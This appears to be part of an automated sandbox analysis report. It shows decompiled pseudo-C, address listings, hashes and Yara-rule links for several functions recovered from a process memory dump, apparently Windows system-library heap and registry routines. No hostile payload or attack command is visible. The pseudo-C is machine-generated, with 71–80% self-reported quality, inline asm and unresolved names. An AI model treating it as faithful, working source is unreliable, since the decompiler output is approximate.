                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c2e4f
                                                                                                                                                    0x030c2e54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c2e5a
                                                                                                                                                    0x030c2e5f
                                                                                                                                                    0x030c2e9a
                                                                                                                                                    0x030c2ea4
                                                                                                                                                    0x030c2ea5
                                                                                                                                                    0x030c2ea8
                                                                                                                                                    0x030c2eaf
                                                                                                                                                    0x030c2eb2
                                                                                                                                                    0x030c2eb5
                                                                                                                                                    0x0311fae9
                                                                                                                                                    0x0311faeb
                                                                                                                                                    0x0311faed
                                                                                                                                                    0x0311faef
                                                                                                                                                    0x0311faf7
                                                                                                                                                    0x0311faf8
                                                                                                                                                    0x0311fafd
                                                                                                                                                    0x0311faff
                                                                                                                                                    0x0311fb04
                                                                                                                                                    0x0311fb04
                                                                                                                                                    0x0311faff
                                                                                                                                                    0x030c2ec0
                                                                                                                                                    0x030c2ec4
                                                                                                                                                    0x030c2ec6
                                                                                                                                                    0x030c2ec8
                                                                                                                                                    0x0311fb14
                                                                                                                                                    0x0311fb18
                                                                                                                                                    0x0311fb1e
                                                                                                                                                    0x0311fb21
                                                                                                                                                    0x0311fb21
                                                                                                                                                    0x030c2ece
                                                                                                                                                    0x030c2ece
                                                                                                                                                    0x030c2ece
                                                                                                                                                    0x030c2ed7
                                                                                                                                                    0x030c2e61
                                                                                                                                                    0x030c2e63
                                                                                                                                                    0x0311fa6b
                                                                                                                                                    0x0311fa71
                                                                                                                                                    0x0311fa76
                                                                                                                                                    0x0311fa78
                                                                                                                                                    0x0311fa8a
                                                                                                                                                    0x0311fa7a
                                                                                                                                                    0x0311fa83
                                                                                                                                                    0x0311fa83
                                                                                                                                                    0x0311fa8f
                                                                                                                                                    0x0311fa91
                                                                                                                                                    0x0311fa97
                                                                                                                                                    0x0311fa9d
                                                                                                                                                    0x0311faa4
                                                                                                                                                    0x0311faaa
                                                                                                                                                    0x0311faaf
                                                                                                                                                    0x0311fab1
                                                                                                                                                    0x0311fac3
                                                                                                                                                    0x0311fab3
                                                                                                                                                    0x0311fabc
                                                                                                                                                    0x0311fabc
                                                                                                                                                    0x0311fac8
                                                                                                                                                    0x0311facb
                                                                                                                                                    0x0311fadf
                                                                                                                                                    0x0311fadf
                                                                                                                                                    0x0311facb
                                                                                                                                                    0x0311faa4
                                                                                                                                                    0x0311fa91
                                                                                                                                                    0x030c2e6f
                                                                                                                                                    0x030c2e6f
                                                                                                                                                    0x030c2e5f
                                                                                                                                                    0x0311fa13
                                                                                                                                                    0x0311fa15
                                                                                                                                                    0x0311fa17
                                                                                                                                                    0x0311fa1f
                                                                                                                                                    0x0311fa21
                                                                                                                                                    0x0311fa22
                                                                                                                                                    0x0311fa25
                                                                                                                                                    0x0311fa28
                                                                                                                                                    0x0311fa2f
                                                                                                                                                    0x0311fa2f
                                                                                                                                                    0x0311fa2a
                                                                                                                                                    0x0311fa2a
                                                                                                                                                    0x0311fa2a
                                                                                                                                                    0x0311fa31
                                                                                                                                                    0x0311fa34
                                                                                                                                                    0x0311fa36
                                                                                                                                                    0x0311fa3c
                                                                                                                                                    0x0311fa3e
                                                                                                                                                    0x0311fa41
                                                                                                                                                    0x0311fa43
                                                                                                                                                    0x0311fa45
                                                                                                                                                    0x0311fa45
                                                                                                                                                    0x0311fa41
                                                                                                                                                    0x0311fa3c
                                                                                                                                                    0x0311fa4a
                                                                                                                                                    0x0311fa4f
                                                                                                                                                    0x0311fa51
                                                                                                                                                    0x0311fa53
                                                                                                                                                    0x0311fa56
                                                                                                                                                    0x0311fa5b
                                                                                                                                                    0x0311fa5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0311fa5e
                                                                                                                                                    0x030c2e23

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RTL: Re-Waiting
                                                                                                                                                    • API String ID: 0-316354757
                                                                                                                                                    • Opcode ID: 3ae2cc9974c47095d8743b67d46d64d32534e57857fb00ce9b8a109894c66263
                                                                                                                                                    • Instruction ID: 118813fe11542ce18b7d29864b647b18f2a596aa2e0de21d03ab1eaf4bb7edff
                                                                                                                                                    • Opcode Fuzzy Hash: 3ae2cc9974c47095d8743b67d46d64d32534e57857fb00ce9b8a109894c66263
                                                                                                                                                    • Instruction Fuzzy Hash: 2D611631A01688DFDF21DB68D850BBEB7E9EB4C710F180AA9E411AB6C0C77499428791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03190EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E03190EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0318FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03191074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03109730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0318A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0318A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x31b8b04 >> 0x14) + (_v44 -  *0x31b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E030E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0318138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E030E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0317FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x31b8724 & 0x00000008) != 0) {
						E031852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E031915B5(0x31b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                                                    0x03190eb7
                                                                                                                                                    0x03190eb9
                                                                                                                                                    0x03190ec0
                                                                                                                                                    0x03190ec2
                                                                                                                                                    0x03190ecd
                                                                                                                                                    0x0319105b
                                                                                                                                                    0x0319105b
                                                                                                                                                    0x03191061
                                                                                                                                                    0x03191066
                                                                                                                                                    0x03191066
                                                                                                                                                    0x0319106b
                                                                                                                                                    0x03191073
                                                                                                                                                    0x03191073
                                                                                                                                                    0x03190ed3
                                                                                                                                                    0x03190ed6
                                                                                                                                                    0x03190edc
                                                                                                                                                    0x03190ee0
                                                                                                                                                    0x03190ee7
                                                                                                                                                    0x03190ef0
                                                                                                                                                    0x03190ef5
                                                                                                                                                    0x03190efa
                                                                                                                                                    0x03190efc
                                                                                                                                                    0x03190efd
                                                                                                                                                    0x03190f03
                                                                                                                                                    0x03190f04
                                                                                                                                                    0x03190f06
                                                                                                                                                    0x03190f07
                                                                                                                                                    0x03190f09
                                                                                                                                                    0x03190f0e
                                                                                                                                                    0x03190f14
                                                                                                                                                    0x03190f23
                                                                                                                                                    0x03190f2d
                                                                                                                                                    0x03190f34
                                                                                                                                                    0x03190f34
                                                                                                                                                    0x03190f14
                                                                                                                                                    0x03190f52
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03190f58
                                                                                                                                                    0x03190f73
                                                                                                                                                    0x03190f74
                                                                                                                                                    0x03190f79
                                                                                                                                                    0x03190f7d
                                                                                                                                                    0x03190f80
                                                                                                                                                    0x03190f86
                                                                                                                                                    0x03190fab
                                                                                                                                                    0x03190fb5
                                                                                                                                                    0x03190fc6
                                                                                                                                                    0x03190fd1
                                                                                                                                                    0x03190fe3
                                                                                                                                                    0x03190fd3
                                                                                                                                                    0x03190fdc
                                                                                                                                                    0x03190fdc
                                                                                                                                                    0x03190feb
                                                                                                                                                    0x03191009
                                                                                                                                                    0x03191009
                                                                                                                                                    0x03191015
                                                                                                                                                    0x03191027
                                                                                                                                                    0x03191017
                                                                                                                                                    0x03191020
                                                                                                                                                    0x03191020
                                                                                                                                                    0x0319102f
                                                                                                                                                    0x0319103c
                                                                                                                                                    0x0319103c
                                                                                                                                                    0x03191048
                                                                                                                                                    0x03191050
                                                                                                                                                    0x03191050
                                                                                                                                                    0x03191055
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03191055
                                                                                                                                                    0x03190f88
                                                                                                                                                    0x03190f9e
                                                                                                                                                    0x03190fa2
                                                                                                                                                    0x03190fa9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03190fa9
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: `
                                                                                                                                                    • API String ID: 0-2679148245
                                                                                                                                                    • Opcode ID: 3e29db7e23554fddca562138e723782f42c265f85d52aa7aa35b6d5062ce6675
                                                                                                                                                    • Instruction ID: ed7ea3f88964dda68b2d3897af9f912ac312b1f15b470749de66dddddbeb997e
                                                                                                                                                    • Opcode Fuzzy Hash: 3e29db7e23554fddca562138e723782f42c265f85d52aa7aa35b6d5062ce6675
                                                                                                                                                    • Instruction Fuzzy Hash: 1351E2712043429FEB24DF29D980B1BB7E5EBCC704F09092EF9968B290D771E945CB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E030FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E030E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03109830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03109990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E031095D0();
							goto L11;
						} else {
							_t109 = L030E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0310F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E031095D0();
										L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                                    0x030ff0d3
                                                                                                                                                    0x030ff0d9
                                                                                                                                                    0x030ff0e0
                                                                                                                                                    0x030ff0e7
                                                                                                                                                    0x030ff0f2
                                                                                                                                                    0x030ff0f4
                                                                                                                                                    0x030ff0f8
                                                                                                                                                    0x030ff100
                                                                                                                                                    0x030ff108
                                                                                                                                                    0x030ff10d
                                                                                                                                                    0x030ff115
                                                                                                                                                    0x030ff116
                                                                                                                                                    0x030ff11f
                                                                                                                                                    0x030ff123
                                                                                                                                                    0x030ff124
                                                                                                                                                    0x030ff12c
                                                                                                                                                    0x030ff130
                                                                                                                                                    0x030ff134
                                                                                                                                                    0x030ff13d
                                                                                                                                                    0x030ff144
                                                                                                                                                    0x030ff14b
                                                                                                                                                    0x030ff152
                                                                                                                                                    0x0313bab0
                                                                                                                                                    0x0313bab0
                                                                                                                                                    0x030ff158
                                                                                                                                                    0x030ff158
                                                                                                                                                    0x030ff15a
                                                                                                                                                    0x030ff160
                                                                                                                                                    0x030ff165
                                                                                                                                                    0x030ff166
                                                                                                                                                    0x030ff16f
                                                                                                                                                    0x030ff173
                                                                                                                                                    0x0313baa7
                                                                                                                                                    0x0313baa7
                                                                                                                                                    0x0313baab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ff179
                                                                                                                                                    0x030ff18d
                                                                                                                                                    0x030ff191
                                                                                                                                                    0x0313baa2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ff197
                                                                                                                                                    0x030ff19b
                                                                                                                                                    0x030ff1a2
                                                                                                                                                    0x030ff1a9
                                                                                                                                                    0x030ff1af
                                                                                                                                                    0x030ff1b2
                                                                                                                                                    0x030ff1b6
                                                                                                                                                    0x030ff1b9
                                                                                                                                                    0x030ff1c4
                                                                                                                                                    0x030ff1d8
                                                                                                                                                    0x030ff1df
                                                                                                                                                    0x030ff1e3
                                                                                                                                                    0x030ff1eb
                                                                                                                                                    0x030ff1ee
                                                                                                                                                    0x030ff1f4
                                                                                                                                                    0x030ff20f
                                                                                                                                                    0x0313bab7
                                                                                                                                                    0x0313babb
                                                                                                                                                    0x0313bacc
                                                                                                                                                    0x0313bad1
                                                                                                                                                    0x030ff215
                                                                                                                                                    0x030ff218
                                                                                                                                                    0x030ff226
                                                                                                                                                    0x030ff22b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ff22b
                                                                                                                                                    0x030ff1f6
                                                                                                                                                    0x030ff1f6
                                                                                                                                                    0x030ff1f9
                                                                                                                                                    0x030ff1fb
                                                                                                                                                    0x030ff1fb
                                                                                                                                                    0x030ff1f4
                                                                                                                                                    0x030ff191
                                                                                                                                                    0x030ff173
                                                                                                                                                    0x030ff152
                                                                                                                                                    0x030ff203

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                    • Instruction ID: 6724ad6fd0d9075af4900188b80ca3abead6d51b5190de3d77be57687678bd5b
                                                                                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                    • Instruction Fuzzy Hash: 4F5180756057159FC320DF59C840A6BBBF8FF88710F00892EF9959B6A0E7B4E914CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03143540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E03143540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x31bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03100BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03143706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0310FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03143540;
						E0310FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0311DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03150C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E031097C0();
					}
					return E0310B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03143971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03143884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0310FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03109650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03143787(_a4,  &_v352, _t80);
						}
					}
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E031095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                                    0x03143552
                                                                                                                                                    0x0314355a
                                                                                                                                                    0x0314355d
                                                                                                                                                    0x03143566
                                                                                                                                                    0x03143567
                                                                                                                                                    0x0314357e
                                                                                                                                                    0x0314358f
                                                                                                                                                    0x031435a1
                                                                                                                                                    0x031435a5
                                                                                                                                                    0x0314366b
                                                                                                                                                    0x0314366b
                                                                                                                                                    0x0314366d
                                                                                                                                                    0x03143672
                                                                                                                                                    0x03143679
                                                                                                                                                    0x03143685
                                                                                                                                                    0x0314368d
                                                                                                                                                    0x0314369d
                                                                                                                                                    0x031436a7
                                                                                                                                                    0x031436b8
                                                                                                                                                    0x031436c6
                                                                                                                                                    0x031436c7
                                                                                                                                                    0x031436dc
                                                                                                                                                    0x031436e1
                                                                                                                                                    0x031436e7
                                                                                                                                                    0x031436e9
                                                                                                                                                    0x031436e9
                                                                                                                                                    0x03143703
                                                                                                                                                    0x03143703
                                                                                                                                                    0x031435b5
                                                                                                                                                    0x031435c0
                                                                                                                                                    0x031435c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031435ca
                                                                                                                                                    0x031435d7
                                                                                                                                                    0x031435e2
                                                                                                                                                    0x031435e6
                                                                                                                                                    0x031435e8
                                                                                                                                                    0x031435f5
                                                                                                                                                    0x031435fa
                                                                                                                                                    0x03143603
                                                                                                                                                    0x03143604
                                                                                                                                                    0x03143609
                                                                                                                                                    0x0314360a
                                                                                                                                                    0x03143612
                                                                                                                                                    0x03143613
                                                                                                                                                    0x0314361e
                                                                                                                                                    0x03143622
                                                                                                                                                    0x03143628
                                                                                                                                                    0x0314362f
                                                                                                                                                    0x0314362f
                                                                                                                                                    0x03143636
                                                                                                                                                    0x03143638
                                                                                                                                                    0x0314363b
                                                                                                                                                    0x03143642
                                                                                                                                                    0x03143642
                                                                                                                                                    0x03143636
                                                                                                                                                    0x03143657
                                                                                                                                                    0x03143657
                                                                                                                                                    0x0314365c
                                                                                                                                                    0x03143662
                                                                                                                                                    0x03143669
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID: BinaryHash
                                                                                                                                                    • API String ID: 2994545307-2202222882
                                                                                                                                                    • Opcode ID: 6bb0fd3f876c5df74830691897875c1d13edc3c58769fc8645ffc4c0b33770bc
                                                                                                                                                    • Instruction ID: c2559cea8a8074a0833902ea11d42280c784885ee4f2a3274bf05b9a79a3d69f
                                                                                                                                                    • Opcode Fuzzy Hash: 6bb0fd3f876c5df74830691897875c1d13edc3c58769fc8645ffc4c0b33770bc
                                                                                                                                                    • Instruction Fuzzy Hash: 414166F5D0062D9BDB21DA50CC81FDEB77CAB48714F0045E5EA18AB280DB709F988F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E031905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E031907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03109730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0318A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0318A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03191293(_t79, _v40, E031907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E030E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0318138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                                                    0x031905c5
                                                                                                                                                    0x031905ca
                                                                                                                                                    0x031905d3
                                                                                                                                                    0x031906db
                                                                                                                                                    0x031906db
                                                                                                                                                    0x031906dd
                                                                                                                                                    0x031906e3
                                                                                                                                                    0x031906e3
                                                                                                                                                    0x031905dd
                                                                                                                                                    0x031905e7
                                                                                                                                                    0x031905f6
                                                                                                                                                    0x03190600
                                                                                                                                                    0x03190607
                                                                                                                                                    0x03190610
                                                                                                                                                    0x03190615
                                                                                                                                                    0x0319061a
                                                                                                                                                    0x0319061c
                                                                                                                                                    0x0319061e
                                                                                                                                                    0x03190624
                                                                                                                                                    0x03190625
                                                                                                                                                    0x03190627
                                                                                                                                                    0x03190628
                                                                                                                                                    0x03190631
                                                                                                                                                    0x03190640
                                                                                                                                                    0x0319064d
                                                                                                                                                    0x03190654
                                                                                                                                                    0x03190654
                                                                                                                                                    0x03190631
                                                                                                                                                    0x0319066d
                                                                                                                                                    0x03190674
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03190692
                                                                                                                                                    0x0319069e
                                                                                                                                                    0x031906b0
                                                                                                                                                    0x031906a0
                                                                                                                                                    0x031906a9
                                                                                                                                                    0x031906a9
                                                                                                                                                    0x031906b8
                                                                                                                                                    0x031906d6
                                                                                                                                                    0x031906d6
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: `
                                                                                                                                                    • API String ID: 0-2679148245
                                                                                                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                                    • Instruction ID: 657df6042066874ffc07c62902dc7ffc1ec40c98bcd1c95f1adba02ca69245f0
                                                                                                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                                    • Instruction Fuzzy Hash: 6E31A032604345ABEB20DF25CD85F9AB799ABCC754F08462AF958DB280D770E944CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

